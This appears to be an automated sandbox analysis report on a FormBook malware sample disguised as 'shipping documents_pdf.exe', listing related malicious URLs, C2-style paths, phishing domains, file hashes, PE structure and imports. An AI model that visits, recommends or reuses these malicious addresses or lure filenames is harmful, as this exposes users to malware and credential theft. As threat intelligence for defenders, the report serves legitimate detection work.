Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:31:34	API Interceptor	7298128x Sleep call for process: schtasks.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.248.169.48	Shipping Documents_pdf.exe	Get hash	malicious	FormBook	Browse	www.sapatarias.online/3632/
	shipping notification_pdf.exe	Get hash	malicious	FormBook	Browse	www.sapatarias.online/3632/
	RN# D7521-RN-00353 REV-2.exe	Get hash	malicious	FormBook	Browse	www.luxe.guru/s9un/
	gvyO903Xmm.exe	Get hash	malicious	FormBook	Browse	www.4it.services/bopi/?_FQ8hB=RB9p3Jfq9ZvBoyq8+0+Fmui7HG2krdiIZXqgFfVf6IzsfIQ1CkKG0m46V1pTk3XN6PXG&qL3=eXSlCFXxoF
	CITA#U00c7#U00c3O.exe	Get hash	malicious	FormBook	Browse	www.dyme.tech/h7lb/
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.smilechat.shop/ih4n/
	PO For Bulk Order.exe	Get hash	malicious	FormBook	Browse	www.sapatarias.online/ep7t/
	CYTAT.exe	Get hash	malicious	FormBook	Browse	www.dyme.tech/h7lb/
	UMOWA_PD.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.invicta.world/tcs6/
	RFQ urrgently.exe	Get hash	malicious	FormBook	Browse	www.smilechat.shop/ih4n/
162.213.249.216	UMOWA_PD.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.dorikis.online/d84b/
83.229.19.82	PO#40296.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.cgtifet-tchad.com/u68r/?zz=fbCBRjo9McCVevzCx7R00N0xbeCrdOemI8/YP8mEjW4tKzUayvTMbjLnrsak6biRxiRI5YBfJwtFCaeoIeUmE9IcNo8e5mMiBQ==&FP-PDJ=eeCoebu
	6290507462-20210204104222.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.cgtifet-tchad.com/u68r/?48gF=fbCBRjo9McCVevzCx7R00N0xbeCrdOemI8/YP8mEjW4tKzUayvTMbjLnrsak6biRxiRI5YBfJwtFCaeoIeUmE+MuUq0bzzgHAA==&51laL=tGPR7
	rszl23077773.exe	Get hash	malicious	FormBook	Browse	www.cgtifet-tchad.com/u68r/?r8jQ=fbCBRjo9McCVevzDvfUQ0+cybeeMeJymI8/YP8mEjW4tKzUayvTMbjLnrsak6biRxiRI5YBfJwtFCaeoIeUrSNMYCJMl1WoiBQ==&hC1s=wWJLtdS6Og9g
	rOrder_0562190.exe	Get hash	malicious	FormBook	Browse	www.cgtifet-tchad.com/u68r/?h1_6Re=fbCBRjo9McCVevzDvfUQ0+cybeeMeJymI8/YP8mEjW4tKzUayvTMbjLnrsak6biRxiRI5YBfJwtFCaeoIeUrSPMZNoMl0WgqBQ==&sbZAov=tW87n2iTdEUHKLa
	e-dekont.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.itechsarl.net/mh21/?lhoTn=VTmtTVChvRC0kdO&OR-h58=LvTCalVuAhIPwuADB4rkMG4czq/NKLNoWqAC8hxsmKd3DVXJ6CiyfSdMXvOBketgJr7n
	pedido.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.cgtifet-tchad.com/qnmo/?S3eQ28YY=nnRhafPl3NssLNvzBNodV81n8AghIF1WXucwPBv+J5kmkflFCuvlTduJJFrhhcyRYRMHT3W0J/yC0yBRgbqglbX7lPq1VtJP2g==&hYAM=0QImJCPORXpj
	E-dekont.pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.itechsarl.net/mh21/?UvZp_=WDKpHpkhnVHH1&HfbXubRx=LvTCalVuAhIPwuADB4rkMG4czq/NKLNoWqAC8hxsmKd3DVXJ6CiyfSdMXvOBketgJr7n
	IS34GDE_WE83_RW454.PP.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.itechsarl.net/mh21/?T6qL=LvTCalVuAhIPwuADB4rkMG4czq/NKLNoWqAC8hxsmKd3DVXJ6CiyfSdMXvOBketgJr7n&CR=lf2D

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
natroredirect.natrocdn.com	Quote #260924.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Quote #270924.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	RN# D7521-RN-00353 REV-2.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	CITA#U00c7#U00c3O.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	rAGROTIS10599242024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	oO3ZmCAeLQ.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Purchase Order_ AEPL-2324-1126.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	AWB_5771388044 Documenti di spedizione.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Cotizaci#U00f3n.exe	Get hash	malicious	FormBook	Browse	85.159.66.93

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CST-AS-APCAMBODIANSINGMENGTELEMEDIACOLTDKH	gEMSIEpwB7.elf	Get hash	malicious	Mirai, Moobot	Browse	43.252.80.166
	f1Am6eCgwR.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	111.92.243.131
	uDQWmosR8J.elf	Get hash	malicious	Unknown	Browse	115.178.25.122
	doc_invoice_no20233004.exe	Get hash	malicious	FormBook, GuLoader	Browse	114.134.188.88
	TzIrVCurxt.elf	Get hash	malicious	Unknown	Browse	111.92.240.98
	nuklear.arm7.elf	Get hash	malicious	Mirai	Browse	103.242.13.10
	sTHGNAHaEy.elf	Get hash	malicious	Unknown	Browse	43.252.80.168
	DIDnHMFV4i.dll	Get hash	malicious	Wannacry	Browse	203.80.170.27
	lDnQSacZne	Get hash	malicious	Mirai	Browse	43.252.80.168
	n6J7QJs4bk.dll	Get hash	malicious	TrickBot	Browse	27.109.116.144
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	https://us.ps-tracks.top/us/	Get hash	malicious	Unknown	Browse	47.90.141.9
	https://b92678.com/	Get hash	malicious	Unknown	Browse	8.211.22.79
	https://bb33382.com:8365/?register=1&agent=4374577496	Get hash	malicious	Unknown	Browse	8.211.22.79
	http://telega-rm.icu/	Get hash	malicious	Unknown	Browse	47.243.119.114
	https://certain-jeweled-verse.glitch.me/newson.htm	Get hash	malicious	HTMLPhisher	Browse	47.254.218.78
	http://www.goo.su/c1Rnox/	Get hash	malicious	Unknown	Browse	47.253.61.56
	https://server.h74w.com/invite/84350172	Get hash	malicious	Unknown	Browse	8.219.197.25
	http://pttroqtr.top/help	Get hash	malicious	Unknown	Browse	8.211.203.165
	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	8.217.145.66
	http://www.telegramrm.com/	Get hash	malicious	Unknown	Browse	47.242.228.6
AMAZON-02US	84.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	https://en.softonic.com	Get hash	malicious	Unknown	Browse	54.171.96.34
	Shipping Documents_pdf.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	SecuriteInfo.com.Linux.Siggen.9999.28931.8128.elf	Get hash	malicious	Mirai	Browse	46.137.223.255
	SecuriteInfo.com.Linux.Siggen.9999.10361.13333.elf	Get hash	malicious	Mirai	Browse	184.77.13.166
	SecuriteInfo.com.Linux.Siggen.9999.28522.3483.elf	Get hash	malicious	Mirai	Browse	35.183.153.123
	https://polidos.com/	Get hash	malicious	Unknown	Browse	52.222.236.94
	https://pokerfanboy.com/	Get hash	malicious	Unknown	Browse	54.74.102.83
	https://ole798.com/	Get hash	malicious	Unknown	Browse	52.214.31.35
	https://mukirecords.com/	Get hash	malicious	Unknown	Browse	13.33.158.57
AS-26496-GO-DADDY-COM-LLCUS	https://sms.outrightmarketing.com/	Get hash	malicious	Unknown	Browse	50.62.142.2
	https://gemmni-lgi.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	198.71.248.123
	https://coenbsasezprrolgenz.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	198.71.248.123
	https://metamskli0n.godaddysites.com/	Get hash	malicious	Unknown	Browse	198.71.248.123
	https://geminloogi.godaddysites.com/	Get hash	malicious	Unknown	Browse	198.71.248.123
	https://mettamisk_signin.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	198.71.248.123
	https://metta-massk-lggoinng.godaddysites.com/	Get hash	malicious	Unknown	Browse	198.71.248.123
	https://gemini_loggin.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse	198.71.248.123
	https://gemini_logip.godaddysites.com/	Get hash	malicious	Unknown	Browse	198.71.248.123
	https://mettamaskzendlogg.godaddysites.com/	Get hash	malicious	Unknown	Browse	198.71.248.123

Process:	C:\Windows\SysWOW64\schtasks.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ectosphere

Download File

Process:	C:\Users\user\Desktop\shipping documents_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.994803478033899
Encrypted:	true
SSDEEP:	6144:Ha6YDi96bxMn8aoGoWMB+2Cx3P0zuGL1sliD4s5ga+wfLnt:Ha7OWx08bGo1YsKGBsM5bPLnt
MD5:	FDD824EBC416BA278558FDCE6F682026
SHA1:	B1F11B0B3AEEC591ACD2FCBB2FCC4AA23666C3D2
SHA-256:	67A47DC96344A13CD22E6626531BBB663FB17D81CE033BB578B46DE2FA7BF73F
SHA-512:	972C4699C4AF994B8B201DB1EC4BA28D5375F1D1463A41F3DEF717D1AA085E28AD81F6A3FBEE9A7FA9E1CB997E9EA820DCCDB969E394BB733DE602279792C141
Malicious:	false
Reputation:	low
Preview:	x....N6R4..0...e.MM...k6[...N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4J.G9Y;T.W5.G.i.By.{.]'ErD8< K8Xk58[#!,hT&.!/>.'Xrp..gT6Q.xT8GjXH6C5SZ)4G.oT-.zY>.v6>.W...#R.@....2S.I..+1.g$-0uV$.SZP5N6R4..G9.4JV#."/XH6C5SZP.N4S?KXG9.1KVY5MNXH6.!SZP%N6RDNSG9.5KFY5MLXH0C5SZP5N0R4JSG9Y5;RY5ONXH6C5QZ..N6B4JCG9Y5[VY%MNXH6C%SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6\|@/+39Y5..]5M^XH6.1SZ@5N6R4JSG9Y5KVY.MN8H6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C5SZP5N6R4JSG9Y5KVY5MNXH6C

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.551477774720921
TrID:	Win32 Executable (generic) a (10002005/4) 95.11% AutoIt3 compiled script executable (510682/80) 4.86% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	shipping documents_pdf.exe
File size:	1'401'815 bytes
MD5:	4f04d4af743c4c282b7f86f002f8bcab
SHA1:	c6bc8b3c1e70e81519ddc8d8319d279361cf4c1e
SHA256:	0d3b7f710ac5caa13f9e5cc85ef5a898e16f919e34bf7d47a0067c070fb572ad
SHA512:	54a1b98f19d5fe772c2ecef32573a9fb218dfd646db5bdec2f0e74141bc3531997dbd39c8247f9883994c8e29ebb9208df64533a6a098ff18597d8d5ca8c5eca
SSDEEP:	24576:ffmMv6Ckr7Mny5QL23CtzdaJ5lA2aAna/JYUbHt+428llGW:f3v+7/5QL23Gzda7aAa/6UhlGW
TLSH:	8355F152F7D680B6D9A33971293BE32BEB3576194327C48B97E02F768F111009B36762
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

File Icon


Icon Hash:	1733312925935517

Static PE Info

General

Entrypoint:	0x416310
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	aaaa8913c89c8aa4a5d93f06853894da

Entrypoint Preview

Instruction
call 00007FD470BF37CCh
jmp 00007FD470BE759Eh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FD470BE772Ah
cmp edi, eax
jc 00007FD470BE78CAh
cmp ecx, 00000100h
jc 00007FD470BE7741h
cmp dword ptr [004A94E0h], 00000000h
je 00007FD470BE7738h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007FD470BE772Ah
pop esi
pop edi
pop ebp
jmp 00007FD470BE7B8Ah
test edi, 00000003h
jne 00007FD470BE7737h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007FD470BE774Ch
rep movsd
jmp dword ptr [00416494h+edx*4]
nop
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007FD470BE772Eh
and eax, 03h
add ecx, eax
jmp dword ptr [004163A8h+eax*4]
jmp dword ptr [004164A4h+ecx*4]
nop
jmp dword ptr [00416428h+ecx*4]
nop
mov eax, E4004163h
arpl word ptr [ecx+00h], ax
or byte ptr [ecx+eax*2+00h], ah
and edx, ecx
mov al, byte ptr [esi]
mov byte ptr [edi], al
mov al, byte ptr [esi+01h]
mov byte ptr [edi+01h], al
mov al, byte ptr [esi+02h]
shr ecx, 02h
mov byte ptr [edi+02h], al
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007FD470BE76EEh

Rich Headers

Programming Language:

[ASM] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[C++] VS2008 SP1 build 30729
[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[ASM] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8cd3c	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xab000	0x9298	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x82000	0x840	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x80017	0x80200	6c20c6bf686768b6f134f5bd508171bc	False	0.5602991615853659	data	6.634688230255595	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x82000	0xd95c	0xda00	f979966509a93083729d23cdfd2a6f2d	False	0.36256450688073394	data	4.880040824124099	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x90000	0x1a518	0x6800	e5d77411f751d28c6eee48a743606795	False	0.1600060096153846	data	2.2017649896261107	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xab000	0x9298	0x9400	f6be76de0ef2c68f397158bf01bdef3e	False	0.4896801097972973	data	5.530303089784181	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xab5c8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xab6f0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xab818	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xab940	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	Great Britain	0.48109756097560974
RT_ICON	0xabfa8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	Great Britain	0.5672043010752689
RT_ICON	0xac290	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	Great Britain	0.6418918918918919
RT_ICON	0xac3b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	Great Britain	0.7044243070362474
RT_ICON	0xad260	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	Great Britain	0.8077617328519856
RT_ICON	0xadb08	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	Great Britain	0.5903179190751445
RT_ICON	0xae070	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	Great Britain	0.5503112033195021
RT_ICON	0xb0618	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	Great Britain	0.6050656660412758
RT_ICON	0xb16c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	Great Britain	0.7553191489361702
RT_MENU	0xb1b28	0x50	data	English	Great Britain	0.9
RT_DIALOG	0xb1b78	0xfc	data	English	Great Britain	0.6507936507936508
RT_STRING	0xb1c78	0x530	data	English	Great Britain	0.33960843373493976
RT_STRING	0xb21a8	0x690	data	English	Great Britain	0.26964285714285713
RT_STRING	0xb2838	0x43a	data	English	Great Britain	0.3733826247689464
RT_STRING	0xb2c78	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xb3278	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xb38d8	0x388	data	English	Great Britain	0.377212389380531
RT_STRING	0xb3c60	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.502906976744186
RT_GROUP_ICON	0xb3db8	0x84	data	English	Great Britain	0.6439393939393939
RT_GROUP_ICON	0xb3e40	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xb3e58	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xb3e70	0x14	data	English	Great Britain	1.25
RT_VERSION	0xb3e88	0x19c	data	English	Great Britain	0.5339805825242718
RT_MANIFEST	0xb4028	0x26c	ASCII text, with CRLF line terminators	English	United States	0.5145161290322581

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll	VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll	WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL	EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll	CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll	HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll	DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
